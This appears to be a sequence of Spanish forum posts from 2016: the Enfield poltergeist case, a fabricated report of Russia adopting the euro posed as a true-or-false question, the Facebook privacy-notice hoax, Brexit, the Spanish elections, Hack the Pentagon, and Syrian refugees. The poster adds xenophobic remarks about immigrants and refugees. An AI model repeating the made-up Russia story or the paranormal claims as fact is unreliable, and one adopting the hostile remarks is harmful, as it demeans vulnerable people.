Pasaron los siguientes dos años estudiando el caso, pero los sucesos no cesaron. Los golpes en las paredes y entresuelo de la vivienda se convirtieron en algo habitual, los muebles se movían y eran lanzados escaleras abajo, los cajones de los muebles salían disparados, los juguetes y otros objetos volaban por la habitación, misteriosos charcos de agua aparecieron en el dormitorio, surgían de la nada lenguas de fuego espontáneo que se extinguían inexplicablemente sin dejar rastro de quemaduras, cortinas que se retorcían como si fueran sacudidas por el viento cuando todas las puertas y ventanas de la casa se encontraban cerradas, incluso sucedieron casos de levitación humana. Janet aseguraba haber sido tomada y arrojada al aire por una entidad invisible (esto está atestiguado por los vecinos).

Muebles caidos tras ser lanzados por el ente invisible

Una noche, tras ser sedada y dormir plácidamente, en la estancia de abajo oyeron un fuerte golpe en la habitación de la niña. Cuando subieron a ver que había ocurrido, se encontraron a Janet durmiendo encima de la cómoda, como si hubiera sido lanzada contra la pared.

Ambas muchachas decían que una fuerza invisible las sacaba de la cama y Janet aseguró que la cortina del lado de su cama se retorcía varias veces en espiral como si de una serpiente se tratara y se le enrollaba en el cuello intentando estrangularla, esto fue confirmado por su madre que fue testigo del suceso más de una vez.


Janet durmiendo encima de la cómoda tras ser lanzada por el ente que la rondaba


Fase 3

Grosse cogiendo a Janet para evitar que se hiciera daño

Uno de los fenómenos que más sorprendió a los investigadores fue una voz extraordinariamente áspera y masculina que salía de la garganta de Janet, decía llamarse Bill Wilkins y haber muerto por una hemorragia cerebral unos años atrás en aquella casa. La niña decía que en esos momentos no ejercía ningún control sobre su propia voz y entraba en trance. La voz decía que pertenecía a varias identidades y hablaba a menudo en lenguaje obsceno. Al entrar en trance o posesión, había que agarrar a Janet fuertemente ya que tenía una fuerza muy superior a la de su edad y a veces solía correr rápidamente a golpearse contra una pared mientras maldecía y decía obscenidades. Psiquiatras y doctores locales estudiaron a Janet y se le llegaron a realizar estudios laringográficos para descartar que las voces que salían de su garganta no habían sido fabricadas conscientemente por ella misma. Los expertos aseguraron que esas voces eran fáciles de provocar y de imitar, pero solo era posible durante un corto periodo de tiempo, ya que las cuerdas vocales se inflamarian y terminarían dañandose. Sin embargo, Janet era capaz de mantener conversaciones de más de un y dos horas.

Janet pasó seis semanas en en Hospital Maudsley en el sur de Londres donde experimentó pruebas precisas para detectar cualquier anomalía tanto física como mental, pero no se encontró nada y durante ese tiempo la actividad poltergeist de la casa cesó completamente. Más tarde volvieron a reanudarse, aunque de un modo más esporádico y menos violento.

Expertos como el Profesor Hasted, jefe del departamento de física de la universidad de Birkbeck y varios investigadores más del SPR concluyeron al final que toda la supuesta actividad paranormal era fruto del engaño de Janet.Jhony, janet y margaret

Una cámara de vídeo puesta en secreto en el dormitorio filmó a Janet doblando cucharas e intentando doblar una barra de hierro con las manos. Ella fue también vista saltando de arriba abajo sobre la cama, de donde ella diría más tarde que fue lanzada.

A pesar de como concluyó este caso, en engaño, allí parece haber fuertes pruebas que concluyen que los fenómenos iniciales que acontecieron en la casa eran genuinamente paranormales..







Los Warren[


Aunque como hemos visto hasta ahora, los principales investigadores de este caso fueron Grosse y Lyon Playfair, el matrimonio Warren hizo su aparición en el verano de 1978. Según Guy Lyon Playfair ante la noticia de que James Wan haría una continuación de la película The Conjuring y que trataría sobre el caso Enfield, declaró que los Warren sólo aparecieron un día por la casa y que además, no habían sido invitados. Además, añadió que Ed Warren le sugirió que podía hacerle conseguir mucho dinero con el caso (al estar Ed muerto, no podremos preguntarle si este acontecimiento ocurrió realmente). Lo que sí es real es lo que pone en el libro de Gerald Brittle El Demonólogo. Ed relata que los fenómenos ocurridos en aquella casa eran ocasionados por espíritus inhumanos. Pero vayamos a lo que escribe Brittle


¿Cuál fue la participación de los Warren en Enfield? Alguna indicación se puede obtener de los papeles de Grosse, en poder de la Sociedad para la Investigación Psíquica.

La primera sorpresa es el tiempo que le tomó a los Warren estar en contacto. Teniendo en cuenta los hechos se iniciaron en agosto de 1977, Lorraine Warren no aparece en la escena hasta el 8 de mayo de 1978. Ella escribió a mano una carta a Grosse en el que le decía que a pesar de que ella no había estado en Enfield, estaba informada de la evolución por medio de un amigo en común, Carlos Moisés de Psychic Research Associates en California. Este hombre había visitado la casa. Lorraine había planeado volar a echar un vistazo y ver lo si podía ayudar. Por una serie de acontecimientos, no había podido viajar, pero ella y Ed esperaban estar en Inglaterra en Junio, con la esperanza de reunirse con Maurice.  A continuación, Lorraine se pone algo seria y pregunta: '¿Sr. Grosse son conscientes de que el trabajo especializado de Ed es el área de la "demonología"? ¿Cuáles son sus sentimientos respecto a ese campo en particular? ¿Cree que puede haber alguna evidencia? ' Ella se despide tras asegurarle a Grosse que ella y él tienen objetivos comunes ',

El 18 de mayo 1978 Grosse respondió con otra carta lamentando que el matrimonio no tuviera tiempo de acercarse a investigar el caso ellos mismos. Indicó que el caso estaba siendo significativo en cuanto a la variedad de fenómenos, tiempo de ocurrencia de estos. Probablemente estaba algo desconcertado por la referencia a la demonología, pero que tenía una mente abierta. A pesar de ello, no había visto los signos de" fuerzas del mal "en el caso. De hecho, concluye que no ha encontrado todavía una teoría para explicar satisfactoriamente la variedad de los fenómenos.

Los Warren aparecen en la casa el mes siguiente y Grosse escribe un informe sobre esta visita el 4 de julio de 1978, que envió a la secretaria de la SPR.

Ed y Lorraine visitan la casa el 16 de junio con un colega y en presencia de Grosse entrevistan a Peggy, Janet y Margaret, y al hermano de Peggy, John Burcombe. Según Grosse, el matrimonio dijo que estaban impresionados con la evidencia. Esa noche Grosse y los miembros de la familia Hodgson participaron en una conversación telefónica con Estados Unidos desde la casa de John Burcombe para un programa "producido por un miembro del Cuerpo de Prensa del presidente Carter ". Después de la emisión Lorraine entró en la casa de los Hodgson y entró en un estado de trance. La señora Warren comenzó a hablar del ex marido de la señora Hodgson, algo que Lorraine no tendría porque saber. Mientras, Ed Warren y su colega estadounidense indagaron por la casa por su cuenta y llevaron a cabo un ritual que no describieron a Grosse, a pesar de que le dijeron que no había tenido ningún efecto. Los tres invitados se fueron justo después de la medianoche y le comentaron a Grosse que marcharian el 27 de junio a los EE.UU. Grosse concluye en su informe: "Yo personalmente estaba muy impresionado con el conocimiento de lo oculto que tenían nuestros invitados y de la manera en que llevaron a cabo su limitada investigación'. La referencia a la "limitada investigación' es en referencia a lo oculto, posiblemente, una forma encubierta de decir que no estaba de acuerdo con su punto de vista.


Guy playfair

Según Gerald Brittle, los Warren volvieron a la casa entre el 6 y el 9 de Agosto e investigaron más a fondo el caso, a la vez que lo estaban haciendo Playfair y Grosse. Cierto es que Playfair en su libro ,This House is Haunted, comenta que los Warren apenas se dejaron ver por la casa, pero esto puede darse por falta de datos. Sin embargo, Brittle en el suyo, The Demonologist: The True Story of Ed and Lorraine Warren estamos viendo da mas fechas y datos.

Es más, siempre según Brittle, los sucesos ocurridos en la casa no terminaron en Abril de 1979 como afirma en su libro Playfair ya que los datos presentados por el autor de El Demonólogo hablan de que en Agosto del mismo año, el matrimonio volvió a la casa, esta vez con dos colegas más. Estuvieron varios días donde consiguieron 13 horas de grabaciones de audio y vídeo e infinidad de fotografías. También se menciona que finalmente fueron con un cura e hicieron un exorcismo.

Si es cierto que siendo el caso poltergeist más documentado de la historia, en pocos lugares se menciona la presencia de los Warren. No por ello devemos desconfiar de los datos ofrecidos por Brittle en su libro. Si hablamos de la pelicula que en breve se va a estrenar en los cines, The Conjuring 2, en ella tampoco sale Guy Playfair, siempre segun el reparto dado por IMDB.

Según contó Janet en una entrevista  en 2012, aunque varios sacerdotes intentaron acabar con el Ente que allí estaba, nunca terminó de irse. Si se consiguió que poco a poco se fueran calmando las cosas pero nunca finalizó. El hermano de Janet, Billy, que vivió en la casa hasta que Peggy murió, siempre ha comentado que de vez en cuando se oían ruidos y que sentía como si alguien le estuviera observando. Otro dato que dio en esta entrevista fue que los sucesos empezaron a ocurrir cuando ella y su hermana Margaret jugaron con la Ouija.



Janet en la entrevista de 2012



Fotografía de la casa en la Actualidad

284 Green Street en la actualidad




Aquí tenéis la entrevista janet



Entrevista de Lyon Playfair y Grosse a las niñas Janet y Margaret.



Bueno quería compartir este caso ya que es uno de los mas documentado en toda la historia de la parapsicología y que me ha llamado mucho la atención viendo la Película de Expediente Warren: El caso Enfield basado en echo reales según por los mismo investigadores e incluso la policía.

Saludos y espero que os guste.


Nota: Quien no le guste estos temas que se ahorre de comentar y si comentan que respeten las opiniones de los demás.

https://notimisterio.wordpress.com/2016/05/09/expediente-warren-el-poltergeist-de-enfield/

#1946

Rusia se prepara para entrar en el Euro

Aprovechando que Reino Unido ha votado sí al Brexit, el gobierno ruso está preparando un referéndum. El objetivo es que los ciudadanos voten sobre si quieren entrar en Europa, abandonando el rublo y adoptando el Euro como moneda para toda Rusia.

El Presidente Vladimir Putin ha reconocido que la presencia inglesa en Europa era el único escollo que impedía integrarse en la Unión. De modo que ahora, gracias al Brexit, ven pista libre para dejar de formar parte de Asia y convertirse en Europa junto con algunas de las repúblicas que formaron parte del imperio ruso hasta hace unos años.

Rusia podría ser incluida de inmediato

Un acuerdo entre Europa y Rusia que data de mediados del siglo pasado, pocos años después del fin de la II Guerra Mundial, podría permitir al país formar parte de la Unión sin tener que pasar por el proceso que se exige a otros aspirantes a miembros. El documento, conocido ya como el Tratado de la Guerra Fría, reconoce el derecho natural de Rusia a formar parte de una hipotética unión de países, siempre y cuando el Reino Unido no esté en dicha unión.

Todo apunta a que si los resultados del referéndum, que se prevé para después del verano, apuestan por ello, al día siguiente de la salida de Reino Unido, Rusia sería miembro de pleno derecho en la Unión Europea, y en menos de un año se pasaría del rublo al Euro. Rusia forma parte del Consejo de Europa desde el año 1996, por lo que 20 años después podría integrarse aún más en el continente.

La Unión también se prepara para despedir al Reino Unido y recibir al que será el país más grande de la Europa unida. Una de las principales ventajas será el suministro de gas, ya que el gasoducto ruso pasará a formar parte del territorio de Europa.


¿CREES QUE LA NOTICIA ES VERDADERA O FALSA?
#1947
Desde hace unos días se está inundando Facebook con textos del estilo 'No doy permiso a Facebook a usar mis imágenes etc.


"Yo NO DOY PERMISO a Facebook para usar mis imágenes, tanto del pasado como del futuro. Con ésta declaración, doy aviso a Facebook que está estrictamente prohibido divulgar, copiar, distribuir o tomar cualquier otra acción contra mi persona en éste perfil y/o el contenido de éste perfil, ya qué es información privada y confidencial. La violación de la privacidad puede ser castigada por la ley BLA BLA BLA, BLA BLA BLA"

Pues sí, llevamos unos días que no se dejan de leer textos de este estilo en muchos perfiles de Facebook. Algo similar ocurre, cada cierto tiempo, en otras redes sociales tipo Twitter o WhatsApp. De golpe, nuestros amigos nos mandan mensajes con que debemos compartir no se qué, o poner en nuestros estado no se cuántos, para que la aplicación sea más segura, siga siendo gratuita o no se puedan usar tus datos o fotos.

Deben saber amiguit@s que da igual, pueden poner lo que quieran en sus perfiles, barras de estado o publicaciones. Facebook no dispone de un equipo de ávidos inspectores para que, una vez leído tu deseo de que no se usen tus datos personales, den orden a otro inexistente departamento de "buenas formas y derechos sobre la intimidad" para cifrar tus datos, fechas, fotos, etc, y que nadie, ni siquiera Facebook, puedan usarlos.

Te preguntarás, entonces, ¿Facebook puede disponer de mi intimidad a su antojo? La respuesta es sí, dentro de unos límites, claro está. Pero no se trata que esta red social, al igual que otras, sean unos ladrones de datos. No. Ellos no realizan nada ilegal. Es más, tú le has dado permiso para dar el tratamiento a tus datos que le dan. ¿Recuerdas eso de "He leído y acepto los términos y condiciones...."? Como todos, dijiste que sí sin haberlo mirado. Y ahí está el quid de la cuestión. En ese contrato, resumiendo, dice algo como que Facebook hará lo que quiera con tus datos, fotos y resto de información, que te estamos dejando participar de nuestra red social sin pagar nada y de alguna manera hay que compensar. Ah, otra cosa, que nos reservamos el derecho de modificar o cambiar todas estas políticas sin avisar, ¿vale?. Y tú, le dices que vale, porque si no, no puedes registrarte y usar la red.

Dicho lo cual, si no quieres que Facebook tenga acceso a tu privacidad, déjate de chorradas y, directamente, no lo uses. Y de la misma manera con el resto de aplicaciones o servicios. Asegúrate de leer y entender lo que dice el contrato, y si hay algo que  no te convence, no aceptes los términos y condiciones de uso.



No se si o esta pasando otra vez pero ahora le han dado por rular otro mensaje mas falso todavía por Fecebook, algunos subnormales lo comparten en su muro creando un rumor totalmente falso estoy harto de ver chorrada de este tipo no se si os pasa ha vosotros os lo cito aquí lo que ahora esta rulando por Fecebook.


CitarMejor prevenir qué lamentar. Canal 11 noticias, está hablando acerca del cambio de política de privacidad de Facebook. Siendo el día 29 de Junio del 2016 a las 21'27 pm ,
Yo NO DOY PERMISO a Facebook para usar mis imágenes, tanto del pasado como del futuro. Con ésta declaración, doy aviso a Facebook qué está estrictamente prohibido divulgar, copiar, distribuir o tomar cualquier otra acción contra mi persona en éste perfil y/o el contenido de éste perfil, ya qué es información privada y confidencial. La violación de la privacidad puede ser castigada por la ley (UUC-1-308-11 308-103).
Nota: Facebook ahora es una entidad pública, una nota como ésta. Sí lo prefieres puedes copiar o pegar ésta versión. Si no, publica una declaración por lo menos una vez, de lo contrario estás tácticamente permitiendo el uso de tus fotos, así como de la información contenida en las actualizaciones del estado de tú perfil. No compartas. Tienes qué copiar y pegar. Ahora ya es oficial! Se ha divulgado en los medios de comunicación. Facebook acaba de publicar la entrada de un precio de £5.99. Para mantener la suscripción de tú estado para ser "Private" Si pegas éste mensaje en tu página, el ofrecimiento será libre (Pegar no compartir) Si no mañana, todas tus publicaciones pueden convertirse en datos públicos, incluso los mensajes o fotos qué se han eliminado. Después de todo, no cuesta nada, simplemente copia y pega.






http://es.blastingnews.com/tecnologia/2016/06/facebook-y-su-aviso-sobre-la-privacidad-00990267.html

#1948
Una nueva foto difundida por la NASA ha desencadenado en el debate sobre la existencia de vida en otros planetas. ¿Se ven restos de una nave espacial o simplemente piedras?



El debate sobre la existencia de vida en otros planetas es eterno, y ahora una imagen de la NASA ha hecho reavivar la polémica. En la fotografía aparece lo que parecen ser restos de una nave espacial o piedras extraterrestres, según las opiniones de los internautas.

Una página web ha intentado aclarar el misterio aclarando la imagen y desvelando que se trataría de algún tipo de maquinaria extraterrestre. No obstante, como comentan muchos usuarios, el montaje es de dudosa credibilidad. Pero como siempre sucede en este caso, las opinión de cada uno es muy personal.


Vuelve las chorradas de Marte yo lo que veo es un pedrusco con una forma muy rara no se que veréis vosotros sigo pensando lo mismo de siempre valiente ruina lo de la NASA gastando dinero en un planeta desértico y helado donde es difícil encontrar vida.
#1949


El Partido Popular ha mejorado en estas elecciones los resultados de 2015 en 14 diputados, de 123 a 137 escaños. Sorpresa en positivo para el PSOE que, al contrario de lo que preveían todos los sondeos, se mantiene como segunda fuerza nacional con 85 escaños, 5 menos que en la anterior cita con las urnas. Unidos Podemos se instala en el tercer lugar con 71 escaños, aumentando 2 desde los comicios de 2015. Ciudadanos, el gran perdedor de la noche, se desploma hasta los 32 diputados, perdiendo 8.


http://es.euronews.com/2016/06/26/elecciones-en-espana-los-lideres-politicos-llaman-a-la-participacion-para-salir/


La unica forma de que no gobierne el PP otra vez en España es que pacten PSOE,Unidos Podemos Y ciudadanos que Pensáis ?  :silbar:

Si otra vez nuevas elecciones para Diciembre que es lo mas probable.
#1950
En el conteo preliminar la votación a favor de abandonar la Unión Europea alcanzó más de 50% de los votos; la libra esterlina tocó su peor nivel contra el dólar desde 1985.


El Brexit triunfó, los británicos eligieron romper los lazos con la Unión Europea. El resultado oficial de la votación en Reino Unido validó que el 52% de los votantes se pronunciaron a favor de abandonar la mancomunidad.

Además, ante la decisión de la ciudadanía, el primer ministro David Cameron anunció su intención de renunciar al cargo en octubre, para dar paso a un liderazgo "fresco" al país en una situación histórica.

Londres y Escocia votaron de manera consistente para mantenerse dentro de la Unión Europea; sin embargo, los votantes del norte de Inglaterra respaldaron la propuesta de salida, sobre todo en lo que respecta a Gales, según reportó la BBC.

Según  la cadena, con un tipo de cambio de 1.35 dólares por libra esterlina, la moneda inglesa tocó su peor nivel con respecto al dólar desde 1985 en una reacción de los mercados a los resultados de la votación.

Con la decisión, Inglaterra se convertiría en el primer miembro de los 28 países en abandonar la Unión Europea. La Unión se ha visto duramente afectada por la crisis y desaceleración económica que siguió a la crisis financiera internacional de 2008, el resurgimiento de Rusia y los flujos masivos de inmigrantes.

Consecuencias para el peso

En días pasados, Gabriela Siller, directora de análisis de Banco Base, advirtió  que la confirmación de un Brexit generaría presiones en contra del peso que podrían llevar  la moneda a su máximo histórico de 19.44 pesos por dólar, y desde ahí a niveles cercanos a 20 pesos por dólar.

"Existe la posibilidad de que la Comisión de Cambios decida intervenir a través del Banco de México (Banxico) con subastas de dólares, aunque los flujos a favor del dólar podrían dificultar la tarea de las autoridades por brindar estabilidad al mercado", señaló.

Economía en Gran Bretaña

El centro de estudios Open Europe previno que Inglaterra tendría una pérdida permanente de 2.2% de su Producto Interno Bruto (PIB) a 2030, añadió que los costos no se compensarían simplemente alcanzando acuerdos de libre comercio con sus anteriores socios.

Además, la consultora PwC proyectó que el crecimiento del Reino Unido sería 5.5% menor en 2020. La Confederación de la Industria Británica proyectó que Reino Unido podría perder 145,000 mdd y 950,000 empleos si sale de la UE.


http://www.forbes.com.mx/triunfa-brexit-inglaterra-abandona-la-union-europea/

Gracias Inglaterra por jodernos mas a los Andaluces ahora no lo vamos ha notar pero con el tiempo lo vamos notar bastante, tanto por la gente que trabajar en Gibraltar como para el turismo sobre todo en Sevilla que la mayoría son ingleses.

Pero lo peor de esto que los cabrones que han votado en Inglaterra son inmigrantes nacido allí con derecho a voto como ha ello le da igual pues votan lo que le salga del nardo.

De todas manera que se preparen por que Escocia, Gales e Irlanda del Norte van a hacer un referéndum para independizarse de Inglaterra así se vais quedar solo.

Ojo por que Francia también esta pidiendo irse de la Unión europea pues ESPAÑA que haga lo mismo digo yo no se que pensáis vosotros.

>:D



#1951


Ash Carter, el Secretario de Defensa en el Pentágono, ha dado las gracias a David Dworken de Washington D.C. por encontrar diversas vulnerabilidades en las páginas web del Departamento de Defensa de los EEUU. Este joven estudiante de 18 años se apuntó a una competición conocida como 'Hackea el Pentágono'.

Esta competición, organizada por la recientemente creada división 'Servicio Digital de Defensa' (DDS), invita a los hackers a poner a prueba la seguridad cibernética de algunas de las páginas web de acceso público del Departamento de Defensa del país, ofreciendo recompensas en metálico en función de la gravedad de la vulnerabibilidad detectada.


Más de 1.400 participantes se apuntaron al proyecto 'Hack the Pentagon' que se puso en marcha este año, encontrando en total 1189 vulnerabilidades repartidas en 138 informes. David Dworken logró encontrar seis vulnerabilidades en esta competición que duró desde el 18 de abril hasta el 12 de mayo de 2016, y en la que no se ofreció acceso a información importante.

Cada día Dworken pasaba entre 10 y 15 horas en su ordenador portátil, tras haber acabado sus trabajos de clase, intentando superar la seguridad de las páginas web indicadas. Fue capaz de encontrar vulnerabilidades que habrían permitido tomar el control de las mismas y robar información de cuentas de sus usuarios.

Aunque Dworken logró informar acerca de seis vulnerabilidades, no recibió ninguna recompensa porque otros ya habían informado acerca de estos fallos previamente. Aun así, parece que diversos reclutadores se han puesto en contacto con él ya que están interesados en el potencial que ha demostrado a tan temprana edad.


El Pentágono afirma que el coste total de este proyecto fue de 150.000 dólares, entre los que se incluían los premios cuyo total ascendía a los 75.000 dólares. Dependiendo de la vulnerabilidad un premio individual podía ir desde los 100 dólares hasta los 15.000 dólares, cuando una auditoría de seguridad realizada por una empresa privada habría costado más de 1 millón de dólares.

http://computerhoy.com/noticias/software/joven-18-anos-hackea-paginas-web-del-pentagono-46844


Esta es la pagina: https://hackerone.com/hackthepentagon
#1952
"Dicen que allí la sanidad es gratis": los sirios que acogerá España preparan su viaje



Nuestro país se ha comprometido a recibir a 586 refugiados antes de que acabe junio. El Confidencial ha contactado a algunos de ellos en el Líbano, un país donde malviven en condiciones precarias

Toda su vida cabe en una maleta. Aparte de un etéreo manojo de memorias, las únicas pertenencias de la familia Al Huri son un Corán, un rosario, una PlayStation y la poca ropa que han acumulado en el Líbano.

Mustafa Al Huri, de 56 años, mira ahora hacia el futuro. Su vida en el Líbano es ya pasado. Los Al Huri forman parte del primer grupo de 82 refugiados sirios que viajará a España desde Beirut los próximos días 28 y 29. No les asusta ir a un país que se presenta de lo más extraño y lejano. Para esta familia siria que lo ha perdido todo, incluso la esperanza de regresar algún día a Siria, España es para ellos la puerta que se ha abierto hacia una nueva vida lejos de la guerra. "No hay futuro en Siria. Vamos a España porque quiero que mis hijos puedan volver a estudiar y tengan un futuro. Para que el día de mañana mis nietos crezcan en un país lejos de la violencia y la inseguridad", anhela el refugiado.

Mustafa Al Huri sabe poco de España, pero está tranquilo: el Gobierno español les va a facilitar una vivienda, cursos de español, sanidad gratuita y ayuda para encontrar empleoHace tres semanas recibieron la tan esperada llamada de la Agencia de la ONU para los Refugiados (ACNUR). Hace más de un año y medio que pidieron asilo en Europa, primero en Alemania, donde vive un familiar, y después en Suecia, donde vive un hermano de Dina, la esposa de Al Huri. "Nos habían denegado dos veces la petición de asilo. Así que fue una grandísima alegría cuando nos volvieron a llamar para decirnos que nos habían aceptado en España", explica Al Huri a El Confidencial.

Confiesa que sabe muy poco de España. Pero está tranquilo porque en una charla informativa en Power Point de treinta minutos sobre el país les dijeron a los refugiados que el Gobierno español iba a facilitarles una vivienda, cursos de español, sanidad gratuita, y ayudarles a encontrar empleo. Han tenido suerte, entre otros motivos por la celeridad del Gobierno español, que se había comprometido a recibir a un total de 586 refugiados antes de que acabe junio: 200 vía reubicación desde Grecia e Italia y 386 vía reasentamiento desde Líbano.

Antes de que estallara el conflicto sirio, Al Huri trabajaba como transportista. "Conducía un camión. Viajaba a Turquía, al Líbano y Jordania. Vivíamos bien. Mis hijos estudiaban en la escuela", rememora el refugiado sirio. Pero todo cambió en marzo de 2012, cuando grupos armados atacaron a las fuerzas del régimen en Bab Al Amr (Homs) y se quedamos atrapados en medio del fuego cruzado. Un proyectil impactó en la vivienda, destruyéndola parcialmente.


Aprender español para volver a estudiar

"Teníamos miedo de que nos bombardearan de nuevo. No tuvimos otra opción que huir al Líbano", explica Al Huri. Huyeron de noche, atravesando a pie una especie de corredor humanitario que abrieron los rebeldes sirios en las montañas, hasta llegar a la ciudad fronteriza libanesa de Arsal, en el Valle de la Bekaa. Nos marchamos con lo puesto. No teníamos nada", indica el refugiado sirio antes de agregar que "nos ayudaron mucho. Gracias a las organizaciones caritativas islámicas de Arabia Saudí y Qatar tuvimos una vivienda, comida y escolarización gratuita para mis hijos".
Pero de nuevo, les tocó huir en agosto de 2014. Está vez a causa grupos armados islámicos como el Frente Al Nusra, que se habían infiltrado en Arsal para atacar al ejército libanés. Desde aquellas escaramuzas, la localidad de Arsal ha estado en constante estado de sitio.

Los Al Huri perdieron su casa cuando los combates llegaron a Baba Al Amr. Se refugiaron en la localidad libanesa de Arsal, pero también tuvieron que huir cuando el Frente Al Nusra se instaló allíAhora la familia Al Huri vive en un piso de alquiler en Haldi, en los suburbios de Beirut. Con mucho esfuerzo y trabajo alcanzan a pagar el alquiler de la vivienda, que asciende a 350 dólares, más los gastos de luz y agua, la comida y el tratamiento para la diabetes del pequeño Taha, de 7 años.

Desde hace más de siete meses, Al Huri ha dejado de trabajar debido a una fuerte tendinitis provocada por los esfuerzos físicos en su empleo como herrero. Taha y su hermana Aya, de 12 años, no han dejado la escuela, pero Obayeh, de 14 años, ha tenido que abandonar los estudios y ponerse a trabajar en un taller de carpintería para ayudar a la familia. El menor trabaja un mínimo de ocho horas diarias y cobra 10 dólares a la semana. "ACNUR nos llamó para hacernos las entrevistas y ofrecernos la oportunidad de ir a España. Yo le insistí mucho a mi padre de que quería ir. Quiero aprender español y poder volver a estudiar porque quiero tener una profesión", señala Obayeh.

Lo que más le preocupa a Dina, la esposa de Al Huri, es no viajar junto a la familia de su hija mayor, Sina, de 23 años. La primogénita tiene dos retoños, de tres años y un año y medio, que nacieron en Beirut. "Nos llamaron a todos juntos para las entrevistas pero mis nietos no tenían el certificado de nacimientos, por lo que se han retrasado con los tramites de mi hija y su familia", explica Sina, antes de agregar: "Tengo miedo de que cuando vengan a España los lleven a otro sitio y no volvamos a estar todos juntos". Al Huri nos revela que están presionando a la Embajada española para que aceleren los trámites de su hija mayor y pueda viajar toda la familia junta.



"Nos han dicho que allí la sanidad es gratuita"

A Muhamad Nur Al Askar, oriundo de Maskana, en la zona rural de Alepo, le gustaría poder llevarse a España su enorme cafetera de latón, que llena con café turco que le prepara su mujer (Fatheya), y lo vende en las calles para poder ganar unos pocos dólares al día. "Si no encuentro trabajo en España podré al menos vender café en la calle", indica Muhamad, que desde que llegó a Beirut hace cuatro años ha trabajado todos los días desde las cinco de la madrugada hasta las once de la noche ofreciendo café a los viandantes y pasajeros de los microbuses en el área de Cola, la estación de autobuses del sur de Beirut.

La vivienda de los Nur Al Askar está desnuda: unos colchones en el suelo y cajas para la ropa. Pagan un alquiler de 550 dólares, más gastosEn la vivienda de alquiler en el barrio de Al Nuwiya (sur de Beirut) viven la familia Nur Al Askar, sus tres hermanos con las esposas y un tropel de niños pequeños. La vivienda están prácticamente desnuda. Unos pocos colchones en el suelo y cajas para guardar algo de ropa. Entre todos pagan un alquiler de 550 dólares, más los gastos.

Nur Al Askar, Fatheya tiene un solo hijo, Hamadi, de 4 años. El pequeño Hamadi nació con una malformación cerebral que le afecta a las funciones psicomotoras. No puede hablar, ni deglutir, y apenas puede caminar sin ayuda de sus padres. Además padece una patología cardiaca. Su estado físico es tan delicado que Fatheya tiene miedo de que cuando el niño suba al avión su corazón no lo resista.

"Me han dicho en la Embajada española que no nos preocupemos, que si es necesario viajará un especialista en cardiología con nosotros", explica la madre de Hamadi. "Nos preocupa mucho la salud de nuestro hijo. Aquí no está bien atendido. No podemos pagarle un tratamiento ni las medicinas. Nos han dicho que en España la sanidad es gratuita y hay buenos especialistas para tratar a Hamadi", agrega esperanzada.


http://www.elconfidencial.com/mundo/2016-06-22/refugiados-espana-siria-crisis-de-los-refugiados-libano_1220727/


Claro que si todo gratis, para vosotros bufer libre en España, para todos los extranjero hay chupar bien de la Sanidad, de la Educación, Etc... Mientra lo pagamos lo Españoles de nuestro bolsillo si supieran estos lo que le cuesta a los Españoles mientras otros no tenemos ni trabajo ni para llegar ha final de mes.


Mira aquí dejo datos de lo que nos cuesta la Sanidad a los Españoles para que se hagáis una idea la gente de fuera lo que nos cuesta a los Españoles.

Citar¿Cuánto cuesta?

Las últimas estimaciones indican que España invierte en sanidad cerca del 10% de su producto interior bruto, incluida la privada. El sistema público se queda el 6,6% del PIB, es decir, cerca de 70.000 millones y algo más de 1.400 euros por persona.

En comparación con los países de su entorno, España invierte menos que la media europea por habitante y también en función al nivel de vida. Según un informe oficial, el gasto en términos de paridad del poder adquisitivo ronda los 2.300 dólares frente a más de 2.900 de media en los países de la UE a 15 (los occidentales, antes de las últimas ampliaciones. Informe de 2010 con datos de 2008).

Es gratis verdad.

Dejo aquí un comentario de un usuario

Citar#20
2016-06-22 20:23:12

GUARDABOSQUES DE VALSAIN

yo tambien quiero sanidad educacion y trabajo y soy español me lo darán?

http://www.elconfidencial.com/mundo/2016-06-22/refugiados-espana-siria-crisis-de-los-refugiados-libano_1220727/
#1953

"Me llamo Esperanza y no me presento a las elecciones. Esta es una carta a mis padres".

Así se abre la pieza de buzoneo electoral que, para bien o para mal, más está dando que hablar en las elecciones del 26-J. Su título ya lo deja claro: 'Esta no es otra carta más para pedir tu voto', gran ejemplo de esa vieja táctica publicitaria (o, en este caso, propagandística) que consiste en diferenciarse de la competencia a través de una negación a là Magritte de la propia naturaleza. Todos sabemos lo que eres, carta, pero ya has capturado mi atención. Es más de lo que algunas cartas de tus rivales conseguirán jamás.

Unidos Podemos está realizando una firme apuesta por el voto joven, de modo que su manera de plantearse su estrategia de buzoneo como un viral resulta lógica y acertada. Sin embargo, otros partidos han intentado lo mismo y, bueno, han fracasado cual colosos con pies de barro. ¿Por qué este viral ha salido tan bien? ¿Qué ingredientes ha puesto en juego para formar parte de la conversación cotidiana durante esta semana pre-comicios? ¿Y, puestos a aventurar, cómo se traducirá su audacia en las urnas? GQ investiga.

1. El formato cotiza al alza

El buzoneo no puede dejar de ser un problema para la nueva política, más que nada porque nos cuesta encontrar un sinónimo más ajustado de la vieja política. ¿Una carta? ¿Quién demonios quiere recibir una carta en 2016? Sin embargo, hay ocasiones en las que un trámite electoral engorroso acaba siendo una bendición camuflada: en el loco, loco, loco mundo de los virales se lleva el formato epistolar y la primera persona, como demuestró hace meses el fenómeno de "Quiero estar soltera, pero contigo". Unidos Podemos ha hecho de su capa un sayo, convirtiendo su petición de voto en una herramienta para alejarse de casi todo lo que entendemos tradicionalmente por "pedir el voto".

2. Comprende y se hace eco del hartazgo generalizado

Esta no podía haber sido la carta de las anteriores elecciones. De hecho, la formación ni siquiera existía en diciembre de 2015, pero no nos referimos a eso. Es un comunicado de segunda vuelta, cuando la inmensa mayoría de la población sabe que va a ir a votar irritada (los que vayan) por haber tenido que llegar hasta aquí. Es una carta, en suma, de segunda vuelta. El mensaje y las formas nunca pueden ser idénticas a las de la primera vez: hay que cambiar de estrategia. Lo cual nos lleva directos al siguiente punto.



3. Emociones por encima de datos

El texto no descuida en absoluto las principales propuestas de su programa, pero sabe cómo adornar esa píldora: con dosis inmoderadas de azúcar. Por supuesto, UP no está solo en esta batalla sentimental: las del 26-J están siendo las Elecciones de las Emociones, en las que el presidente del gobierno en funciones anuncia al mundo su pasión a flor de piel por las alcachofas, la palabra "SÍ" en caracteres +70 se coloca estrategicamente delante de las siglas de un partido e incluso entidades tan racionales como Albert Rivera son obligadas a esgrimir conceptos abstractos ("cambio", "mejora", "compromiso", "sensatez") por encima de datos fríos. En unos tiempos en los que todo debate político tarda milésimas de segundo en tornarse económico, los principales partidos han comprendido que tanto pragmatismo, tanta verdad compleja, aturde al electorado. Si queremos moverlo y removerlo, debemos apelar a instintos más primarios.

